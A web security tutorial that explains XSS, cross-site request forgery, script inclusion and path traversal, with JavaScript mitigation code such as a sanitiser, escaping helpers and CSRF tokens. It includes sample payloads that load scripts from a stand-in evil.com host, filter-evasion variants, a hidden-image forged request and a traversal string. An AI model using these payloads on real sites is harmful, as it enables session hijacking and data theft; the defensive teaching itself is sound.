Basic XSS and how to mitigate it
What is a Cross Site Scripting (XSS) attack?
The "cross site" part comes from the fact that the malicious code lives on the attacker's server (or on a third party the attacker has access to). There are two ways an attacker can inject malicious code into a target machine: by submitting it to sites that accept user content such as comments (stored XSS), or by creating malicious URLs which, when browsed to, trigger the attack (reflected XSS).
Typically the malicious code uses some trick to include a script tag with the code that does the damage:
<script src="http://evil.com/oh-dear.js"></script> Just an innocent comment...
To defuse the attacks, code and links need to be sanitised.
Can code from different domains be run in a web page? And why?
Yes. Browsers have always let a page load scripts from other origins through script tags, and there are good reasons for it. (Cross-Origin Resource Sharing, or CORS, is a separate mechanism that governs whether scripts on one origin may read responses from another.)
People want to import third party code into their sites: the classic example is Google Analytics. Or they want to use versions of popular libraries stored on a CDN (think jQuery, hosted on //code.jquery.com/), hoping that visitors will already have them in their cache by the time they reach the site. Or, for sites still using HTTP/1.x, they want to put their assets on a different domain or subdomain, because a browser only downloads a limited number of files in parallel from the same domain (think Yahoo, who put all their assets on //s.yimg.com). Or they run a global website with a variety of localised domains (think amazon.de, amazon.fr ... all downloading scripts from amazon.com). Or, while developing on a subdomain (new-version.example.com), they want to download assets from the live site (say www.example.com).
Can you control which domain downloads which scripts?
There is an HTTP header which you can set on your server, Access-Control-Allow-Origin, to control which other origins may read your assets from their scripts. It is universally supported, but it doesn't really help with XSS: it restricts how other sites use your resources, while you want the opposite, which is to keep their code off your pages.
What you really want is a Content Security Policy (CSP), which tells the browser which sources a page is allowed to load scripts and other resources from. All current major browsers support it.
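As a rough illustration, a policy is just a header value listing the allowed sources per resource type. The sketch below builds one from a plain object; `buildCsp` and the choice of allowed sources are assumptions made for the example, not part of any library.

```javascript
// Hypothetical helper: turn a policy object into a Content-Security-Policy header value.
function buildCsp(policy) {
  return Object.entries(policy)
    .map(([directive, sources]) => `${directive} ${sources.join(' ')}`)
    .join('; ');
}

// Assumed policy: only our own origin, plus scripts from the jQuery CDN.
const policy = {
  'default-src': ["'self'"],
  'script-src': ["'self'", 'https://code.jquery.com'],
};

const cspHeader = buildCsp(policy);
console.log(cspHeader);
// default-src 'self'; script-src 'self' https://code.jquery.com
```

On a Node server the value would typically be sent with something like `res.setHeader('Content-Security-Policy', cspHeader)`. With this policy a script tag pointing at evil.com would be refused by the browser, and so would inline scripts.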
Stored XSS: File Upload displayed in an iframe
When a site allows users to upload files which are then displayed to other users in an iframe, an attacker could upload an HTML file with a script tag inside:
This is my cool HTML page <script><!-- ... here I can do evil things ... --></script>
This is a relatively simple attack to mitigate. Since you control the server where the malicious code is stored, you can simply make sure the uploaded documents are saved on a separate subdomain, say user-content.example.com, and then they won't have access to content on the main domain.
The classic reflected XSS attack tries to add a script tag to a URL: https://example.com/<script>..evil.. </script>. Of course the attack will never be so blatant, but browsers and other apps can do substitutions for special characters, so the payload can be disguised. Although these days browsers have built-in protection for most cases, it's interesting to know what we are being protected against. And anyway, some day you may find yourself coding for an environment where that protection doesn't exist. The substitutions include:
- URL % encoding
- double URL % encoding
- bad UTF-8 encoding
- HTML encoding
- double HTML encoding
- ASCII encoding
- ASCII encoding with hexadecimal
- ASCII encoding with unicode
- a C style encoding
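To make the first two items concrete, here is a small sketch of why double URL encoding matters: a filter that decodes once sees nothing suspicious, while a second decode further down the pipeline restores the tag. `fullyDecode` is a hypothetical helper written for this example.

```javascript
const payload = '<script>';
const once = encodeURIComponent(payload);  // %3Cscript%3E
const twice = encodeURIComponent(once);    // %253Cscript%253E

// A filter that decodes only once finds no angle bracket in the double-encoded form...
const afterOneDecode = decodeURIComponent(twice);
const looksSafe = !afterOneDecode.includes('<');

// ...but a second decode later on brings the tag back.
const afterTwoDecodes = decodeURIComponent(afterOneDecode);

// Hypothetical helper: keep decoding until the value stops changing (bounded).
function fullyDecode(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch {
      return current; // malformed escape sequence: stop decoding
    }
    if (next === current) return current;
    current = next;
  }
  return current;
}

console.log(looksSafe, afterTwoDecodes, fullyDecode(twice));
// true <script> <script>
```

Checking the fully decoded value, rather than the value after a single decode, is one way to avoid being fooled by nested encodings.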
In the typical stored XSS attack, a site has a comment system or something similar, and the attacker tries to submit an HTML fragment with a script tag in it. There are different ways they can try that.
Simple attacks with script tags and HTML sanitisation
The obvious way may work if the site was built by hobbyists or amateurs, but a simple regular expression is usually enough to stop it:
Great site! <script src="http://evil.com/xss.js"></script>
Regular expressions are not the best approach though. One reason is that they can easily match valid HTML, but attackers often get around them by submitting invalid HTML, taking advantage of the fact that browsers are very forgiving. So they could submit the following:
Great site! <a href="<script src="http://evil.com/xss.js"></script>
Or use hidden, non-rendered characters that can break a regular expression but are ignored by many browsers:
Great site! <scr\0ipt src="http://evil.com/xss.js"></sc\0ript>
Or even simply use upper case letters:
Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>
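The following sketch shows a deliberately naive filter of the kind described above, and how two of the variants slip past it. The regular expression is an assumption chosen for the example, not a recommended pattern.

```javascript
// Deliberately naive filter: case-sensitive and expecting well-formed tags.
function naiveStrip(html) {
  return html.replace(/<script[^>]*>.*?<\/script>/g, '');
}

const plain = 'Great site! <script src="http://evil.com/xss.js"></script>';
const upper = 'Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>';
const withNul = 'Great site! <scr\0ipt src="http://evil.com/xss.js"></sc\0ript>';

console.log(naiveStrip(plain) === 'Great site! '); // true: the obvious attack is removed
console.log(naiveStrip(upper) === upper);          // true: upper case passes through untouched
console.log(naiveStrip(withNul) === withNul);      // true: the NUL character defeats the match
```

Adding the `i` flag would catch the upper case variant, but not the one with the embedded NUL character, which is the general problem with chasing variants one pattern at a time.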
The best approach to sanitisation is:
- parse the input into a DOM tree which is not rendered in the page
- have a whitelist of allowed tags and attributes, and go through every node of the parsed DOM, deleting whatever is not on the whitelist
- make sure any URLs and CSS attributes that are allowed are strictly sanitised. Careful of URLs using the
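The whitelist walk can be sketched as below. To keep the example self-contained it works on a plain object tree rather than a real DOM: the node shape (`{ tag, attrs, children }`), the whitelist contents and the "http(s) links only" rule are all assumptions made for illustration. In a browser the tree would come from an off-page parse of the submitted HTML.

```javascript
// Assumed whitelist; a real site would choose its own.
const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'a']);
const ALLOWED_ATTRS = { a: new Set(['href']) };

// Assumed URL rule: only absolute http(s) links survive.
function isSafeUrl(url) {
  return /^https?:\/\//i.test(String(url).trim());
}

// Hypothetical node shape: { tag, attrs, children } for elements, plain strings for text.
// Returns a cleaned copy, or null when the element itself is not allowed.
function sanitise(node) {
  if (typeof node === 'string') return node;
  const tag = node.tag.toLowerCase();
  if (!ALLOWED_TAGS.has(tag)) return null;

  const allowedAttrs = ALLOWED_ATTRS[tag] || new Set();
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs || {})) {
    const key = name.toLowerCase();
    if (!allowedAttrs.has(key)) continue;              // drops onmouseover, style, ...
    if (key === 'href' && !isSafeUrl(value)) continue; // drops non-http(s) URLs
    attrs[key] = value;
  }

  const children = (node.children || [])
    .map(sanitise)
    .filter((child) => child !== null);
  return { tag, attrs, children };
}

const dirty = {
  tag: 'P',
  attrs: { ONMOUSEOVER: 'evil()' },
  children: [
    'Great site! ',
    { tag: 'script', attrs: { src: 'http://evil.com/xss.js' }, children: [] },
    { tag: 'a', attrs: { href: 'javascript:evil()' }, children: ['link'] },
  ],
};
const clean = sanitise(dirty);
console.log(JSON.stringify(clean));
// {"tag":"p","attrs":{},"children":["Great site! ",{"tag":"a","attrs":{},"children":["link"]}]}
```

The key design choice is that everything is dropped unless it is explicitly allowed, so unknown tags and attributes never need to be anticipated. Text nodes would still need HTML escaping when the tree is serialised back into the page.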
Using HTML attributes for xss attacks
<p ONMOUSEOVER="var d=document;var s=d.createElement('script');s.src='http://evil.com/xss.js';d.body.appendChild(s);">Great site!</p>
Using CSS attributes for xss attacks
If a site allows users to, say, choose a color for the text of their comments, an attacker could submit something like red;" onmouseover="...evil JS..." and the result would be:
<!-- what the coder expected the final results to be when they built the site -->
<p style="color:SOME_CUSTOM_COLOR;">My Home Page</p>
<!-- what the attacker injected -->
<p style="color:red;" onmouseover="...evil JS...">My Home Page</p>
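One possible defence, sketched under the assumption that the site only needs hex colours or plain colour names: validate the value against a strict pattern, and escape anything that is written into an attribute. `safeColour` and `escapeAttr` are hypothetical helpers for this example.

```javascript
// Accept only hex colours or simple colour names; anything else becomes the fallback.
function safeColour(input, fallback = 'black') {
  const value = String(input).trim();
  const isHex = /^#(?:[0-9a-f]{3}|[0-9a-f]{6})$/i.test(value);
  const isName = /^[a-z]{1,20}$/i.test(value);
  return isHex || isName ? value : fallback;
}

// Escape the characters that could break out of a double-quoted attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const attack = 'red;" onmouseover="...evil JS..."';
console.log(safeColour(attack));  // black
console.log(safeColour('#ff0000')); // #ff0000
console.log(escapeAttr(attack));  // red;&quot; onmouseover=&quot;...evil JS...&quot;
```

Validation rejects the payload outright, while escaping keeps it inside the style attribute as inert text. Using both means a mistake in one does not immediately become an exploit.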
A typical XSS fragment for a site that allows user submissions:
innocent looking text and then <span style=display:none>" + (...evil js..., "") + "</span> nothing to see here
That relies on the fact that the code will be inserted into the page via JS, with code such as:
$someElement.innerHTML = "innocent looking text and then <span style=display:none>" + (...evil js..., "") + "</span> nothing to see here";
The not so common comma operator in (...evil js..., "") returns the item on the right. The comma operator is often used when golfing / minifying, but rarely when hand coding because it hurts readability. It simply evaluates the item on the left, discards the result and returns the item on the right:
var a = (1, 2); console.log(a); // 2
So it is important to escape strings that will be handled by JS with \x27 for single quotes and \x22 for doubles.
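A minimal sketch of that escaping is shown below. `escapeForJsString` is a hypothetical helper; besides the two quote characters it also escapes backslashes (so the attacker cannot undo the escaping), angle brackets and newlines, which is an extra precaution added here rather than something the text above requires.

```javascript
// Escape a value so it can sit inside a quoted JS string literal.
function escapeForJsString(value) {
  return String(value)
    .replace(/\\/g, '\\\\') // backslashes first, so later escapes are not doubled
    .replace(/'/g, '\\x27')
    .replace(/"/g, '\\x22')
    .replace(/</g, '\\x3c')
    .replace(/>/g, '\\x3e')
    .replace(/\r/g, '\\r')
    .replace(/\n/g, '\\n');
}

const submitted = '" + (alert(1), "") + "';
const escaped = escapeForJsString(submitted);
console.log(escaped);
// \x22 + (alert(1), \x22\x22) + \x22
```

Once escaped, the submission can no longer close the surrounding string literal, so the comma-operator trick stays ordinary text instead of being evaluated.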
Reflected XSS via AJAX
Sometimes a site takes a fragment of text from the URL and processes it in the page. An example is Google Translate:
https://translate.google.com/#en/de/...evil js..., where "...evil js..." could be
<script>evil js</script> and may be inserted in the translation box and translated, if the site isn't careful (obviously Google are). The way to handle this is to escape the
<> characters with
\x3c\x3e. It is also important to set the charset of your document with
Content-Type: text/html; charset=utf-8, to avoid the browser interpreting as utf-7, where
+AD4- are the encodings for
Cross-Site Request Forgery (XSRF)
This happens when an attacker stores some code in a page that requests a resource (often an image, but it could be the favicon too, for example) from a separate third party site, for example your bank, or Facebook (although sites like these are unlikely to be unprotected against such attacks). If you are already logged in to the third party site, the browser will send your cookies and everything else along with the request. So you could have an exploit such as:
An innocent message, la la
<!-- The attacker hides the exploit with display:none. The src is a (fake) command
     which the user needs to be logged in to run; if the user IS already logged in,
     it will be run, as the cookies will be sent. It doesn't matter that the response
     is not an image, because of the display:none. -->
<img style="display:none" src="http://facebook.com/post/?msg=blah">
To mitigate those attacks, for a start make sure you use POST and not GET in your requests. With each POST request, send a token with a timestamp, and expire the login if the timestamp is too old (old = a few minutes). Generate a new token for every request. Maybe even generate different tokens for different types of requests.
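The timestamped, per-request-type token could look roughly like the sketch below, which uses Node's built-in crypto module. The token format, the five minute limit and the function names are assumptions for illustration. The sketch only covers expiry and binding a token to a session and an action; making tokens strictly single-use would also need server-side storage, which is not shown.

```javascript
const crypto = require('crypto');

const MAX_AGE_MS = 5 * 60 * 1000; // "a few minutes"; the exact value is an assumption

// Sign the session, the type of request and the timestamp with a server-side secret.
function sign(secret, sessionId, action, timestamp) {
  return crypto
    .createHmac('sha256', secret)
    .update(`${sessionId}|${action}|${timestamp}`)
    .digest('hex');
}

// Hypothetical token format: "<timestamp>.<hex signature>".
function createToken(secret, sessionId, action, now = Date.now()) {
  return `${now}.${sign(secret, sessionId, action, now)}`;
}

function verifyToken(secret, sessionId, action, token, now = Date.now()) {
  const [timestampText, signature] = String(token).split('.');
  const timestamp = Number(timestampText);
  if (!Number.isFinite(timestamp) || !signature) return false;
  if (timestamp > now || now - timestamp > MAX_AGE_MS) return false; // too old, or from the future

  const expected = Buffer.from(sign(secret, sessionId, action, timestamp));
  const actual = Buffer.from(signature);
  // timingSafeEqual throws on different lengths, so compare lengths first.
  return expected.length === actual.length && crypto.timingSafeEqual(expected, actual);
}

const issuedAt = 1000000;
const token = createToken('server-secret', 'session-1', 'post-message', issuedAt);
console.log(verifyToken('server-secret', 'session-1', 'post-message', token, issuedAt + 60 * 1000));     // true
console.log(verifyToken('server-secret', 'session-1', 'post-message', token, issuedAt + 6 * 60 * 1000)); // false
console.log(verifyToken('server-secret', 'session-1', 'delete-account', token, issuedAt + 60 * 1000));   // false
```

The hidden image in the exploit above cannot supply a valid token, because the attacker's page has no way to read one from the target site.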
Cross Site Script Inclusion (XSSI)
In this case the attacker includes your script in their page. That way they can read any variables accessible to your script, since the browser doesn't distinguish between the two environments. The simplest example is when someone has sensitive data simply embedded in the JS:
// your_script.js
var privateKey = "-----BEGIN RSA PRIVATE KEY-----" // etc

// attacker_page.html
<!doctype HTML>
<html>
<head>
<script src="your_script.js"></script>
<script>alert(privateKey)</script>
...
Another source of attacks is JSONP, as an attacker can simply override the callback function.
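The callback override can be simulated in Node with the built-in vm module, which here stands in for the attacker's page loading the response through a script tag. The response body, the `handleAccount` callback name and the account data are all made up for the example.

```javascript
const vm = require('vm');

// What a (hypothetical) JSONP endpoint might return for a logged-in user.
const jsonpResponse = 'handleAccount({"user":"alice","balance":1200});';

// The attacker's page defines its own handleAccount before including the script.
const stolen = [];
const attackerGlobals = {
  handleAccount: (data) => {
    stolen.push(data);
  },
};

// Running the response with the attacker's globals stands in for the browser
// executing a script tag whose src points at the JSONP endpoint.
vm.runInNewContext(jsonpResponse, attackerGlobals);

console.log(stolen[0].user); // alice
```

Because the browser sends the victim's cookies with the script request, the response contains the victim's data, and whoever defines the callback receives it.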
The defence is simply not to put sensitive information inside JS or JSONP responses. Other steps are the same as for XSRF (use POST, use tokens), and make scripts non-executable by adding prefixes such as
Path traversal is the classic exploit which tries to trick the server into serving files outside the server root.
Few servers are configured by default to allow that, but be careful when customising configurations. Also be careful about allowing users to choose strings such as brett/../../ as a username.
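Both checks can be sketched with Node's built-in path module. `resolveInsideRoot`, `isSafeUsername`, the /var/www root and the username rules are assumptions made for this example, and the requested path is assumed to have been URL-decoded already.

```javascript
const path = require('path');

// Resolve a requested path against the root and refuse anything that escapes it.
// path.posix is used so the example behaves the same on every platform.
function resolveInsideRoot(root, requested) {
  const rootDir = path.posix.resolve(root);
  const target = path.posix.resolve(rootDir, './' + requested);
  const inside = target === rootDir || target.startsWith(rootDir + '/');
  return inside ? target : null;
}

// Assumed username rule: letters, digits, underscore and hyphen only.
function isSafeUsername(name) {
  return /^[A-Za-z0-9_-]{1,32}$/.test(name);
}

console.log(resolveInsideRoot('/var/www', 'images/logo.png'));    // /var/www/images/logo.png
console.log(resolveInsideRoot('/var/www', '../../etc/passwd'));   // null
console.log(resolveInsideRoot('/var/www', 'brett/../../secret')); // null
console.log(isSafeUsername('brett/../../'));                      // false
```

Resolving first and comparing afterwards means the check looks at where the path actually ends up, rather than trying to spot ../ sequences in the raw string.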
This is just scratching the surface of XSS and related attacks; it is a specialist field which, however, every front end developer should at least be familiar with.